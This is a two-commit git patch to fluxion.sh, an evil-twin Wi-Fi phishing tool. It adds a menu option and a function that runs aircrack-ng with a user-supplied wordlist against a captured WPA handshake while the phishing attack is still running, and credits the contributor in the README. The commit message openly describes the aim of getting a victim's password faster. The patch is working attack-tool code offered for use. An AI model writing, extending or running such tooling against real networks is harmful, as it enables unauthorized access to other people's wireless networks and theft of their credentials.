From a66458d4e87d9e92758950d3ad9270c5d7a4156a Mon Sep 17 00:00:00 2001 From: princeofguilty Date: Sun, 2 Jul 2017 11:49:00 +0100 Subject: [PATCH 1/2] Bruteforce while attacking using web interface might be lucky and find the password faster than waiting for the victim to be trapped by the evil twin attack.. anyway it wont affect the web interface at all, you can do both at the same time trying to catch the password using the fastest way --- fluxion.sh | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/fluxion.sh b/fluxion.sh index c5b97c4..74656fa 100755 --- a/fluxion.sh +++ b/fluxion.sh @@ -2101,13 +2101,15 @@ function attack { echo -e ""$red"["$yellow"2"$red"]"$transparent" Attack in progress .." echo " " echo " 1) Choose another network" - echo " 2) Exit" + echo " 2) Dictionary Bruteforce *wont stop current attack*" + echo " 3) Exit" echo " " echo -n ' #> ' read yn case $yn in 1 ) matartodo; CSVDB=dump-01.csv; selection; break;; - 2 ) matartodo; exitmode; break;; + 2 ) Bruteforce;; + 3 ) matartodo; exitmode; break;; * ) echo " $general_case_error"; conditional_clear ;; esac @@ -2115,6 +2117,14 @@ $general_case_error"; conditional_clear ;; } +function Bruteforce { + + echo "where is your Dictionary: _" + read Dictionary0 + xterm -title "aircrack-ng $Host_MAC --by Princeofguilty" -e "aircrack-ng $DUMP_PATH/$Host_MAC-01.cap -w $Dictionary0" + +} + # Checks the validity of the password function handshakecheck { From 881c70eb438bf3556f34019cc3b8120335040af2 Mon Sep 17 00:00:00 2001 From: princeofguilty Date: Sun, 2 Jul 2017 11:50:36 +0100 Subject: [PATCH 2/2] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 304d2d1..6feee25 100644 --- a/README.md +++ b/README.md @@ -61,7 +61,7 @@ A Linux-based operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling 2. dlinkproto - contributor 3. vk496 - developer of linset 4. Derv82 - @Wifite/2 -5. Princeofguilty - @webpages +5. Princeofguilty - @webpages and @buteforce 6. Photos for wiki @http://www.kalitutorials.net 7. Ons Ali @wallpaper 8. PappleTec @sites